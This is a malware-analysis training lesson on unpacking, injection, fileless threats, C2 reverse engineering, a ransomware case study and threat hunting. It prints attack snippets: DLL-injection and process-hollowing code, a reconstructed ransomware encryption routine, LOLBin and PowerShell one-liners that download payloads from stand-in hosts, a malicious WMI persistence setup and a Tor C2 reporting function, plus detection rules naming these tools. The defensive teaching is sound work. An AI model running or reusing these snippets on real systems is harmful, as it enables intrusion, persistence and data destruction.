Malware Analysis – Lesson 2: Advanced Techniques and Practical Examples
Table of Contents
- Advanced Static Analysis: Unpacking and Deobfuscation
- Reverse Engineering Cryptographic Functions
- Advanced Dynamic Analysis: Code Injection Techniques
- Analyzing Fileless Malware
- C2 Communication Protocol Reverse Engineering
- Practical Case Study: Ransomware Analysis
- Automated Analysis Pipeline Development
- Advanced Persistence Mechanism Analysis
- Mobile Malware Analysis Fundamentals
- Threat Hunting with Analysis Results
1. Advanced Static Analysis: Unpacking and Deobfuscation
Understanding Packers
Packers compress and encrypt executable files to evade detection and analysis. Common packers include UPX, Themida, VMProtect, and custom packers.
Identifying Packed Executables:
1. Entropy Analysis:
# Python script to calculate section entropy
import math
import pefile
def calculate_entropy(data):
if not data:
return 0
entropy = 0
for x in range(256):
p_x = float(data.count(x)) / len(data)
if p_x > 0:
entropy += - p_x * math.log(p_x, 2)
return entropy
pe = pefile.PE('packed_malware.exe')
for section in pe.sections:
entropy = calculate_entropy(section.get_data())
print(f"{section.Name.decode().rstrip('\x00')}: {entropy:.2f}")
- Entropy > 7.0 often indicates compression/encryption
2. Section Characteristics:
- Small .text section with large .data or custom sections
- Unusual section names
- Write + Execute permissions on sections
Manual Unpacking Techniques
Step-by-Step UPX Unpacking:
1. Load in x64dbg:
- Open the packed executable
- Navigate to entry point (F9 to run to entry point)
2. Find OEP (Original Entry Point):
Common techniques:
- ESP tracking method
- Jump to OEP pattern (JMP or PUSH/RET)
- Memory breakpoints on section access
3. ESP Tracking Method:
; At entry point
PUSHAD ; Save all registers
; ... unpacking code ...
POPAD ; Restore registers
JMP original_entry_point ; Jump to OEP
- Set hardware breakpoint on ESP access
- Run until POPAD instruction
- Step until JMP to OEP
4. Dumping Unpacked Code:
- Use Scylla plugin in x64dbg
- Dump process at OEP
- Fix Import Address Table (IAT)
Advanced Deobfuscation
Control Flow Flattening:
Original code:
if (condition) {
actionA();
} else {
actionB();
}
Obfuscated:
state = 1;
while (1) {
switch(state) {
case 1:
if (condition) state = 2;
else state = 3;
break;
case 2:
actionA();
state = 4;
break;
case 3:
actionB();
state = 4;
break;
case 4:
return;
}
}
Deobfuscation Approach:
- Identify dispatcher loop
- Trace execution flow
- Reconstruct original control flow
- Use IDA Python scripts for automation
String Deobfuscation
Common String Obfuscation:
1. XOR Encryption:
# IDA Python script to decrypt XOR strings
def xor_decrypt(encrypted, key):
decrypted = []
for i, char in enumerate(encrypted):
decrypted.append(chr(char ^ key[i % len(key)]))
return ''.join(decrypted)
# Find encrypted string references
ea = idc.get_screen_ea()
encrypted_data = idc.get_bytes(ea, 50)
key = [0x41, 0x42, 0x43] # Found through analysis
print(xor_decrypt(encrypted_data, key))
2. Stack Strings:
; Building strings on stack
mov dword ptr [esp], 'ht'
mov dword ptr [esp+2], 'tp'
mov dword ptr [esp+4], '://'
; Results in "http://"
2. Reverse Engineering Cryptographic Functions
Identifying Cryptographic Operations
Common Crypto Constants:
# AES S-box first values
AES_SBOX = [0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5]
# MD5 initialization values
MD5_INIT = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
# RC4 key scheduling
RC4_PATTERN = "mov byte ptr [ecx+eax], dl"
IDA Pro FLIRT Signatures:
- Apply crypto library signatures
- Identify standard implementations
- Look for custom modifications
Analyzing Custom Crypto
Step-by-Step RC4 Analysis:
1. Key Scheduling Algorithm (KSA):
// Identify this pattern in assembly
for (i = 0; i < 256; i++) {
S[i] = i;
}
j = 0;
for (i = 0; i < 256; i++) {
j = (j + S[i] + key[i % keylen]) % 256;
swap(S[i], S[j]);
}
2. Pseudo-Random Generation Algorithm (PRGA):
i = j = 0;
while (generating_output) {
i = (i + 1) % 256;
j = (j + S[i]) % 256;
swap(S[i], S[j]);
K = S[(S[i] + S[j]) % 256];
output = input ^ K;
}
3. Extracting Keys:
- Set breakpoints at crypto functions
- Dump memory containing key material
- Trace key derivation functions
Practical Decryption Example
Ransomware Configuration Decryption:
# Found through reverse engineering
def decrypt_config(encrypted_config):
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
# Key found in binary at offset 0x4A300
key = b'\x11\x22\x33\x44' * 4 # 16 bytes for AES-128
iv = b'\x00' * 16 # Often zeros or hardcoded
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(encrypted_config)
# Remove PKCS7 padding
config = unpad(decrypted, AES.block_size)
return config
# Extract C2 servers from decrypted config
import json
config_data = decrypt_config(encrypted_blob)
config = json.loads(config_data)
print("C2 Servers:", config['c2_servers'])
print("Encryption Key:", config['file_encryption_key'])
3. Advanced Dynamic Analysis: Code Injection Techniques
Process Injection Methods
1. Classic DLL Injection:
// Injection code pattern
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
LPVOID pRemoteBuffer = VirtualAllocEx(hProcess, NULL, dllPathSize,
MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pRemoteBuffer, dllPath, dllPathSize, NULL);
HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
LPVOID pLoadLibrary = GetProcAddress(hKernel32, "LoadLibraryA");
CreateRemoteThread(hProcess, NULL, 0, pLoadLibrary, pRemoteBuffer, 0, NULL);
Monitoring with WinAPIOverride:
- Attach to target process
- Monitor for:
- OpenProcess calls
- VirtualAllocEx allocations
- WriteProcessMemory operations
- CreateRemoteThread creation
2. Process Hollowing:
; Typical hollowing sequence
CreateProcess(..., CREATE_SUSPENDED, ...)
GetThreadContext(hThread, &context)
ReadProcessMemory(...) ; Read headers
NtUnmapViewOfSection(hProcess, pImageBase)
VirtualAllocEx(hProcess, pImageBase, ...)
WriteProcessMemory(...) ; Write malicious PE
SetThreadContext(hThread, &context)
ResumeThread(hThread)
Detection in Sysmon:
<!-- Sysmon config for process hollowing detection -->
<ProcessCreate onmatch="include">
<CommandLine condition="is">CREATE_SUSPENDED</CommandLine>
</ProcessCreate>
<ProcessAccess onmatch="include">
<GrantedAccess>0x1F0FFF</GrantedAccess>
</ProcessAccess>
Advanced Injection Techniques
3. AtomBombing:
// Atom table injection
GlobalAddAtom(shellcode_chunk);
// Force target to access atom table
NtQueueApcThread(hThread, GlobalGetAtomName, ...)
4. SetWindowsHookEx Injection:
Monitoring approach:
# Volatility plugin to detect hooks
volatility -f memory.dmp --profile=Win10x64 messagehooks
# Check for suspicious hook procedures
volatility -f memory.dmp --profile=Win10x64 callbacks
Shellcode Analysis
Extracting Injected Code:
1. Process Memory Dump:
# Using Process Hacker
1. Right-click on process
2. Properties -> Memory
3. Find RWX regions
4. Save selected region
2. Shellcode Emulation:
# Using Unicorn Engine
from unicorn import *
from unicorn.x86_const import *
def emulate_shellcode(shellcode):
mu = Uc(UC_ARCH_X86, UC_MODE_32)
# Map memory
mu.mem_map(0x1000000, 2 * 1024 * 1024)
mu.mem_write(0x1000000, shellcode)
# Set up stack
mu.reg_write(UC_X86_REG_ESP, 0x1200000)
# Hook API calls
def hook_code(uc, address, size, user_data):
print(f"Executing: 0x{address:x}")
mu.hook_add(UC_HOOK_CODE, hook_code)
# Start emulation
mu.emu_start(0x1000000, 0x1000000 + len(shellcode))
4. Analyzing Fileless Malware
PowerShell-Based Threats
Deobfuscating PowerShell:
1. Common Obfuscation Patterns:
# Obfuscated
${`e`x`e`c} = &('n'+'ew-ob'+'ject') NeT.WeBcLiEnT
${d`o`w`n} = ${`e`x`e`c}."d`o`w`N`l`o`A`d`S`t`R`i`n`g"('ht'+'tp://c2.com/payload')
# Deobfuscated
$exec = New-Object Net.WebClient
$down = $exec.DownloadString('http://c2.com/payload')
2. PowerShell Logging:
# Enable transcript logging
Start-Transcript -Path "C:\Analysis\ps_log.txt" -Append
# Enable script block logging via Group Policy
Computer Configuration > Policies > Administrative Templates >
Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging
3. Memory Analysis of PowerShell:
# Volatility command to extract PowerShell history
volatility -f memory.dmp --profile=Win10x64 consoles
# Extract .NET assemblies from memory
volatility -f memory.dmp --profile=Win10x64 dumpdotnet -D output/
WMI-Based Persistence
Detecting WMI Implants:
1. Query WMI Repository:
# List all WMI Event Filters
Get-WMIObject -Namespace root\subscription -Class __EventFilter
# List Event Consumers
Get-WMIObject -Namespace root\subscription -Class __EventConsumer
# List Bindings
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding
2. Malicious WMI Example:
# Malicious Event Filter (triggers every 60 seconds)
$Filter = Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter -Arguments @{
Name = "MaliciousFilter"
EventNameSpace = "root\cimv2"
QueryLanguage = "WQL"
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"
}
# CommandLineEventConsumer (executes PowerShell)
$Consumer = Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer -Arguments @{
Name = "MaliciousConsumer"
CommandLineTemplate = "powershell.exe -NoP -W Hidden -Enc <base64_payload>"
}
Living-off-the-Land Techniques
Analyzing LOLBins Usage:
1. Common LOLBins Patterns:
# Downloading with certutil
certutil.exe -urlcache -split -f http://malicious.com/payload.exe
# Execution via mshta
mshta.exe javascript:close(new ActiveXObject('WScript.Shell').Run('powershell -enc <payload>'))
# DLL execution with rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("malicious_code")
2. Detection Strategy:
<!-- Sysmon rule for LOLBin detection -->
<ProcessCreate onmatch="include">
<CommandLine condition="contains">certutil -urlcache</CommandLine>
<CommandLine condition="contains">mshta javascript:</CommandLine>
<CommandLine condition="contains">rundll32.exe javascript:</CommandLine>
</ProcessCreate>
5. C2 Communication Protocol Reverse Engineering
HTTP/HTTPS C2 Analysis
Dissecting C2 Protocols:
1. Custom HTTP Headers:
POST /api/beacon HTTP/1.1
Host: legitimate-site.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0)
X-Session-ID: AES256(victim_id + timestamp)
X-Request-Type: beacon
Cookie: session=BASE64(encrypted_data)
ENCRYPTED_PAYLOAD_DATA
2. Protocol Reverse Engineering Steps:
- Capture multiple communication sessions
- Identify patterns in headers/data
- Correlate with binary analysis
- Decrypt/decode payloads
DNS Tunneling Analysis
Identifying DNS C2:
1. Suspicious DNS Patterns:
# Wireshark display filter
dns.qry.name matches "^[a-f0-9]{32}\." and dns.qry.type == 1
# Example DNS tunneling query
# 61626364656667686970717273747576.malicious-c2.com
# Decoded: "abcdefghipqrstuv" (data exfiltration)
2. Decoding DNS Tunneling:
import base64
import struct
def decode_dns_tunnel(queries):
data = b''
for query in queries:
subdomain = query.split('.')[0]
# Common encoding: hex
chunk = bytes.fromhex(subdomain)
data += chunk
# May need additional decoding
return decompress(decrypt(data))
Custom Binary Protocols
Reverse Engineering Binary C2:
1. Protocol Structure Analysis:
struct C2_Packet {
uint32_t magic; // 0xDEADBEEF
uint16_t packet_type; // Command type
uint16_t packet_length; // Data length
uint32_t session_id; // Victim identifier
uint8_t encrypted_data[]; // AES encrypted payload
};
2. Creating Protocol Dissector:
-- Wireshark Lua dissector
local c2_proto = Proto("c2", "Custom C2 Protocol")
local f_magic = ProtoField.uint32("c2.magic", "Magic", base.HEX)
local f_type = ProtoField.uint16("c2.type", "Type", base.DEC)
local f_length = ProtoField.uint16("c2.length", "Length", base.DEC)
local f_session = ProtoField.uint32("c2.session", "Session ID", base.HEX)
c2_proto.fields = {f_magic, f_type, f_length, f_session}
function c2_proto.dissector(buffer, pinfo, tree)
pinfo.cols.protocol = "C2"
local subtree = tree:add(c2_proto, buffer(), "C2 Protocol")
subtree:add(f_magic, buffer(0,4))
subtree:add(f_type, buffer(4,2))
subtree:add(f_length, buffer(6,2))
subtree:add(f_session, buffer(8,4))
end
tcp_table = DissectorTable.get("tcp.port")
tcp_table:add(8443, c2_proto)
6. Practical Case Study: Ransomware Analysis
Initial Triage
Sample: CryptoLocker Variant
1. Static Properties:
SHA256: a1b2c3d4e5f6789...
File Type: PE32 executable
Compile Time: 2024-01-15 08:30:00
Packer: UPX 3.96
2. Behavioral Summary:
- Terminates shadow copies
- Encrypts files with .locked extension
- Drops ransom note: DECRYPT_INSTRUCTIONS.txt
- Communicates with Tor hidden service
Detailed Analysis Workflow
Step 1: Unpacking
; UPX unpacking at OEP
0x00401000: PUSHAD
0x00401001: MOV ESI, 0x00409000 ; Packed data
0x00401006: MOV EDI, 0x00401000 ; Destination
...
0x00401150: POPAD
0x00401151: JMP 0x004A5000 ; Original Entry Point
Step 2: Encryption Routine Analysis
// Reconstructed from assembly
void encrypt_file(char* filename) {
FILE* file = fopen(filename, "rb");
if (!file) return;
// Generate unique file key
unsigned char file_key[32];
CryptGenRandom(hProv, 32, file_key);
// Encrypt file key with RSA public key
unsigned char encrypted_key[256];
RSA_public_encrypt(32, file_key, encrypted_key, rsa_public, RSA_PKCS1_OAEP_PADDING);
// Read file content
fseek(file, 0, SEEK_END);
long file_size = ftell(file);
fseek(file, 0, SEEK_SET);
unsigned char* buffer = malloc(file_size);
fread(buffer, 1, file_size, file);
fclose(file);
// AES-256 CBC encryption
AES_KEY aes_key;
AES_set_encrypt_key(file_key, 256, &aes_key);
unsigned char iv[16] = {0};
AES_cbc_encrypt(buffer, buffer, file_size, &aes_key, iv, AES_ENCRYPT);
// Write encrypted file
char new_filename[MAX_PATH];
sprintf(new_filename, "%s.locked", filename);
file = fopen(new_filename, "wb");
// File structure: [RSA_encrypted_key][AES_encrypted_data]
fwrite(encrypted_key, 1, 256, file);
fwrite(buffer, 1, file_size, file);
fclose(file);
// Delete original
DeleteFile(filename);
}
Step 3: Kill Switch Discovery
# IDA Python script to find kill switch
import idaapi
import idc
# Search for mutex creation
mutex_refs = []
for addr in idautils.XrefsTo(idc.get_name_ea_simple("CreateMutexW")):
mutex_refs.append(addr.frm)
# Analyze mutex names
for ref in mutex_refs:
# Trace back to find mutex name
mutex_name_addr = idc.get_operand_value(ref - 0x10, 1)
mutex_name = idc.get_strlit_contents(mutex_name_addr, -1, idc.STRTYPE_UNICODE)
print(f"Mutex: {mutex_name}")
# Found: Global\MsCryptoLockerKillSwitch2024
Step 4: C2 Communication
# Extracted Tor configuration
TOR_HIDDEN_SERVICE = "cryptolocker2024xxxxxxxxx.onion"
BITCOIN_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
# Communication protocol
def send_infection_report(victim_id, encrypted_files_count):
data = {
"victim_id": victim_id,
"timestamp": time.time(),
"files_encrypted": encrypted_files_count,
"bitcoin_address": BITCOIN_ADDRESS,
"system_info": get_system_info()
}
# Send via Tor
session = requests.Session()
session.proxies = {'http': 'socks5h://localhost:9050',
'https': 'socks5h://localhost:9050'}
response = session.post(f"http://{TOR_HIDDEN_SERVICE}/report",
json=data, timeout=30)
Recovery and Mitigation
File Recovery Attempts:
1. Check for Encryption Flaws:
# Analyze encryption implementation
# Found: IV reuse vulnerability in early versions
def attempt_recovery(encrypted_file):
# If same IV used for multiple files
# Known plaintext attack possible
pass
2. Shadow Copy Recovery:
vssadmin list shadows
# If ransomware failed to delete all shadows
mklink /d C:\ShadowRestore \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
7. Automated Analysis Pipeline Development
Building an Analysis Framework
Architecture Overview:
# analysis_pipeline.py
import os
import hashlib
import subprocess
import json
from datetime import datetime
class MalwareAnalysisPipeline:
def __init__(self, sample_path):
self.sample_path = sample_path
self.sample_hash = self.calculate_hash()
self.results = {
"hash": self.sample_hash,
"timestamp": datetime.now().isoformat(),
"static_analysis": {},
"dynamic_analysis": {},
"network_analysis": {},
"verdict": "unknown"
}
def calculate_hash(self):
sha256_hash = hashlib.sha256()
with open(self.sample_path, "rb") as f:
for byte_block in iter(lambda: f.read(4096), b""):
sha256_hash.update(byte_block)
return sha256_hash.hexdigest()
def run_static_analysis(self):
# PE analysis
pe_info = self.analyze_pe_structure()
self.results["static_analysis"]["pe_info"] = pe_info
# String extraction
strings = self.extract_strings()
self.results["static_analysis"]["strings"] = strings
# YARA scanning
yara_matches = self.run_yara_rules()
self.results["static_analysis"]["yara_matches"] = yara_matches
def run_dynamic_analysis(self):
# Sandbox execution
sandbox_report = self.execute_in_sandbox()
self.results["dynamic_analysis"] = sandbox_report
def analyze_pe_structure(self):
# Using pefile
import pefile
pe = pefile.PE(self.sample_path)
return {
"imphash": pe.get_imphash(),
"compile_time": datetime.fromtimestamp(pe.FILE_HEADER.TimeDateStamp).isoformat(),
"sections": [
{
"name": section.Name.decode().rstrip('\x00'),
"virtual_size": section.Misc_VirtualSize,
"raw_size": section.SizeOfRawData,
"entropy": section.get_entropy()
}
for section in pe.sections
],
"imports": self.extract_imports(pe)
}
def execute_in_sandbox(self):
# Cuckoo Sandbox integration
cmd = ["cuckoo", "submit", "--file", self.sample_path]
result = subprocess.run(cmd, capture_output=True, text=True)
task_id = json.loads(result.stdout)["task_id"]
# Wait for analysis completion
# ... (implement polling logic)
# Retrieve report
report_cmd = ["cuckoo", "report", str(task_id)]
report = subprocess.run(report_cmd, capture_output=True, text=True)
return json.loads(report.stdout)
Integration with Threat Intelligence
Threat Intel Enrichment:
class ThreatIntelligence:
def __init__(self, api_keys):
self.vt_api_key = api_keys.get('virustotal')
self.otx_api_key = api_keys.get('alienvault_otx')
self.misp_url = api_keys.get('misp_url')
self.misp_key = api_keys.get('misp_key')
def check_virustotal(self, file_hash):
import requests
headers = {"x-apikey": self.vt_api_key}
url = f"https://www.virustotal.com/api/v3/files/{file_hash}"
response = requests.get(url, headers=headers)
if response.status_code == 200:
data = response.json()
return {
"detections": data["data"]["attributes"]["last_analysis_stats"],
"names": data["data"]["attributes"]["names"],
"first_seen": data["data"]["attributes"]["first_submission_date"]
}
return None
def check_otx_pulses(self, indicator):
from OTXv2 import OTXv2
otx = OTXv2(self.otx_api_key)
pulses = otx.get_indicator_details_full(indicator_type='file',
indicator=indicator)
return {
"pulse_count": len(pulses["general"]["pulse_info"]["pulses"]),
"pulses": pulses["general"]["pulse_info"]["pulses"][:5] # Top 5
}
def submit_to_misp(self, analysis_results):
from pymisp import PyMISP, MISPEvent, MISPObject
misp = PyMISP(self.misp_url, self.misp_key)
event = MISPEvent()
event.info = f"Automated Analysis: {analysis_results['hash']}"
event.threat_level_id = 2 # Medium
event.analysis = 2 # Completed
# Add file object
file_obj = MISPObject('file')
file_obj.add_attribute('sha256', value=analysis_results['hash'])
file_obj.add_attribute('filename', value=analysis_results.get('filename', 'unknown'))
# Add network indicators
for domain in analysis_results.get('contacted_domains', []):
event.add_attribute('domain', domain)
event.add_object(file_obj)
result = misp.add_event(event)
return result
Automated Reporting
Report Generation:
from jinja2 import Template
import pdfkit
class ReportGenerator:
def __init__(self, template_path):
with open(template_path, 'r') as f:
self.template = Template(f.read())
def generate_html_report(self, analysis_results):
html_content = self.template.render(
sample=analysis_results,
timestamp=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
analyst="Automated Analysis System"
)
return html_content
def generate_pdf_report(self, analysis_results, output_path):
html_content = self.generate_html_report(analysis_results)
options = {
'page-size': 'A4',
'margin-top': '0.75in',
'margin-right': '0.75in',
'margin-bottom': '0.75in',
'margin-left': '0.75in',
'encoding': "UTF-8",
'no-outline': None
}
pdfkit.from_string(html_content, output_path, options=options)
8. Advanced Persistence Mechanism Analysis
Registry Persistence
Common Registry Locations:
# Registry monitoring script
import winreg
PERSISTENCE_KEYS = [
(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run"),
(winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\Run"),
(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
(winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"),
(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce"),
# Image File Execution Options (IFEO)
(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"),
# AppInit_DLLs
(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"),
# Winlogon
(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"),
]
def scan_persistence_registry():
findings = []
for hive, key_path in PERSISTENCE_KEYS:
try:
key = winreg.OpenKey(hive, key_path, 0, winreg.KEY_READ)
i = 0
while True:
try:
name, value, type = winreg.EnumValue(key, i)
findings.append({
"hive": hive,
"key": key_path,
"name": name,
"value": value,
"suspicious": analyze_suspicious_entry(name, value)
})
i += 1
except WindowsError:
break
winreg.CloseKey(key)
except Exception as e:
continue
return findings
def analyze_suspicious_entry(name, value):
suspicious_indicators = [
"powershell",
"cmd.exe /c",
"wscript",
"mshta",
"rundll32",
"regsvr32",
"-enc",
"-nop",
"-w hidden",
"http://",
"https://",
".ps1",
".vbs",
".js"
]
value_lower = value.lower()
return any(indicator in value_lower for indicator in suspicious_indicators)
Scheduled Task Persistence
Analyzing Scheduled Tasks:
# PowerShell script to examine scheduled tasks
$suspiciousTasks = Get-ScheduledTask | Where-Object {
$_.Actions.Execute -match 'powershell|cmd|wscript|mshta|rundll32' -or
$_.Actions.Arguments -match '-enc|-nop|hidden|http'
} | Select-Object TaskName, TaskPath, State, Author, Date, Actions
# Export detailed task information
foreach ($task in $suspiciousTasks) {
$taskInfo = Get-ScheduledTaskInfo -TaskName $task.TaskName
$task | Add-Member -NotePropertyName LastRunTime -NotePropertyValue $taskInfo.LastRunTime
$task | Add-Member -NotePropertyName NextRunTime -NotePropertyValue $taskInfo.NextRunTime
# Export task XML for analysis
Export-ScheduledTask -TaskName $task.TaskName |
Out-File "C:\Analysis\Tasks\$($task.TaskName).xml"
}
Service-Based Persistence
Service Analysis:
import wmi
import subprocess
def analyze_services():
c = wmi.WMI()
suspicious_services = []
for service in c.Win32_Service():
# Check for suspicious characteristics
if any([
not service.PathName,
service.PathName and 'temp' in service.PathName.lower(),
service.PathName and 'appdata' in service.PathName.lower(),
service.PathName and any(sus in service.PathName.lower()
for sus in ['powershell', 'cmd.exe', 'wscript']),
service.StartName and service.StartName.lower() not in
['localsystem', 'nt authority\\system', 'nt authority\\localservice',
'nt authority\\networkservice']
]):
suspicious_services.append({
'name': service.Name,
'display_name': service.DisplayName,
'path': service.PathName,
'start_type': service.StartMode,
'account': service.StartName,
'state': service.State,
'description': service.Description
})
return suspicious_services
# Check for service DLL hijacking
def check_service_dll_hijacking():
# Query services that load DLLs
output = subprocess.check_output([
'wmic', 'service', 'where',
"PathName like '%svchost.exe%'",
'get', 'Name,PathName,ProcessId'
], text=True)
# Check each svchost service's loaded DLLs
# ... (implementation details)
9. Mobile Malware Analysis Fundamentals
Android Malware Analysis
Setting Up Android Analysis Environment:
1. Android Virtual Device (AVD):
# Create AVD with Google APIs (for Play Services)
avdmanager create avd -n malware_analysis -k "system-images;android-29;google_apis;x86"
# Start emulator with writable system
emulator -avd malware_analysis -writable-system -no-snapshot
2. Essential Tools:
- jadx: DEX to Java decompiler
- apktool: APK reverse engineering
- Frida: Dynamic instrumentation
- MobSF: Mobile Security Framework
Static Analysis Workflow:
# Extract APK contents
apktool d malicious.apk -o malicious_decoded/
# Examine AndroidManifest.xml
cat malicious_decoded/AndroidManifest.xml | grep -E "permission|service|receiver"
# Decompile to Java
jadx malicious.apk -d jadx_output/
# Search for suspicious patterns
grep -r "exec\|Runtime\|ProcessBuilder" jadx_output/
grep -r "DexClassLoader\|PathClassLoader" jadx_output/
grep -r "android.permission.SEND_SMS" jadx_output/
Dynamic Analysis with Frida:
// Frida script to monitor sensitive API calls
Java.perform(function() {
// Monitor SMS sending
var SmsManager = Java.use('android.telephony.SmsManager');
SmsManager.sendTextMessage.implementation = function(dest, sc, text, pi, di) {
console.log('[SMS] Destination: ' + dest);
console.log('[SMS] Text: ' + text);
// Call original method
return this.sendTextMessage(dest, sc, text, pi, di);
};
// Monitor file access
var File = Java.use('java.io.File');
File.$init.overload('java.lang.String').implementation = function(path) {
console.log('[File] Accessing: ' + path);
return this.$init(path);
};
// Monitor network connections
var URL = Java.use('java.net.URL');
URL.openConnection.implementation = function() {
console.log('[Network] Connecting to: ' + this.toString());
return this.openConnection();
};
});
iOS Malware Analysis
Jailbroken Device Setup:
1. Essential Cydia Tools:
- Frida
- SSL Kill Switch 2
- dumpdecrypted
- class-dump
2. Binary Analysis:
# Decrypt IPA
./dumpdecrypted.dylib MaliciousApp
# Extract class information
class-dump -H MaliciousApp -o headers/
# Check for suspicious frameworks
otool -L MaliciousApp | grep -v "/System"
10. Threat Hunting with Analysis Results
Creating Detection Rules
Sigma Rules from Analysis:
title: Ransomware File Encryption Activity
id: a1b2c3d4-5678-9012-3456-789012345678
status: experimental
description: Detects mass file encryption typical of ransomware
author: Security Analyst
date: 2024/01/01
logsource:
product: windows
service: sysmon
detection:
selection:
EventID: 11 # File creation
TargetFilename|endswith:
- '.locked'
- '.encrypted'
- '.crypto'
timeframe: 10s
condition: selection | count() > 100
falsepositives:
- Legitimate encryption software
level: high
Converting to YARA:
rule Ransomware_Encryption_Routine {
meta:
description = "Detects ransomware encryption functions"
author = "Analysis Team"
date = "2024-01-01"
strings:
$api1 = "CryptGenRandom"
$api2 = "CryptEncrypt"
$api3 = "CryptAcquireContext"
$str1 = "Your files have been encrypted"
$str2 = ".locked"
$pattern = {48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 85 C0}
condition:
uint16(0) == 0x5A4D and
all of ($api*) and
any of ($str*) and
$pattern
}
Threat Hunting Queries
KQL Queries for Threat Hunting:
// Process injection detection
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName in~ ("notepad.exe", "calc.exe", "svchost.exe")
| where InitiatingProcessFileName !in~ ("services.exe", "winlogon.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine
| where ProcessCommandLine contains "powershell" or
ProcessCommandLine contains "cmd"
// Suspicious PowerShell execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "powershell.exe"
| where ProcessCommandLine contains "-enc" or
ProcessCommandLine contains "-nop" or
ProcessCommandLine contains "-w hidden"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessFileName
| summarize Count = count() by DeviceName, bin(Timestamp, 1h)
| where Count > 10
Incident Response Integration
Automated Response Playbook:
class IncidentResponseAutomation:
def __init__(self, analysis_results):
self.results = analysis_results
self.ioc_list = self.extract_iocs()
def extract_iocs(self):
iocs = {
'file_hashes': [],
'domains': [],
'ip_addresses': [],
'file_paths': [],
'registry_keys': [],
'mutexes': []
}
# Extract from analysis results
# ... (parsing logic)
return iocs
def block_network_iocs(self):
# Update firewall rules
for domain in self.ioc_list['domains']:
subprocess.run(['netsh', 'advfirewall', 'firewall', 'add', 'rule',
f'name="Block {domain}"', 'dir=out', 'action=block',
f'remoteip={domain}'])
# Update DNS blackhole
with open('/etc/bind/blackhole.conf', 'a') as f:
for domain in self.ioc_list['domains']:
f.write(f'zone "{domain}" {{ type master; file "/etc/bind/db.blackhole"; }};\n')
def deploy_yara_rules(self):
# Generate YARA rule from analysis
rule = self.generate_yara_rule()
# Deploy to endpoints
# ... (deployment logic)
def create_investigation_timeline(self):
timeline = []
# Process creation events
for event in self.results.get('process_events', []):
timeline.append({
'timestamp': event['timestamp'],
'type': 'process_creation',
'details': event
})
# Network events
for event in self.results.get('network_events', []):
timeline.append({
'timestamp': event['timestamp'],
'type': 'network_connection',
'details': event
})
# Sort by timestamp
timeline.sort(key=lambda x: x['timestamp'])
return timeline
This lesson has covered advanced malware analysis techniques including:
- Advanced unpacking and deobfuscation methods
- Cryptographic function reverse engineering
- Sophisticated injection technique analysis
- Fileless malware investigation
- C2 protocol reverse engineering
- Practical ransomware case study
- Automation pipeline development
- Persistence mechanism analysis
- Mobile malware fundamentals
- Threat hunting integration
These techniques build upon the fundamentals from Lesson 1, providing security professionals with practical skills for analyzing sophisticated threats. Remember that malware analysis is an evolving field, continually update your skills and tools to keep pace with emerging threats.
Key Takeaways
- Automation is Essential: Build repeatable processes to handle the volume of threats
- Context Matters: Understanding the full attack chain is more valuable than isolated IOCs
- Share Intelligence: Contributing to the security community strengthens collective defense
- Continuous Learning: New techniques emerge constantly - stay current with research
What's next?
- Practice with malware analysis challenges and CTFs
- Contribute to open-source security projects
- Share findings with the security community
- Build relationships with other analysts
Remember: The goal is always to improve defenses and protect systems, not to enable malicious activities.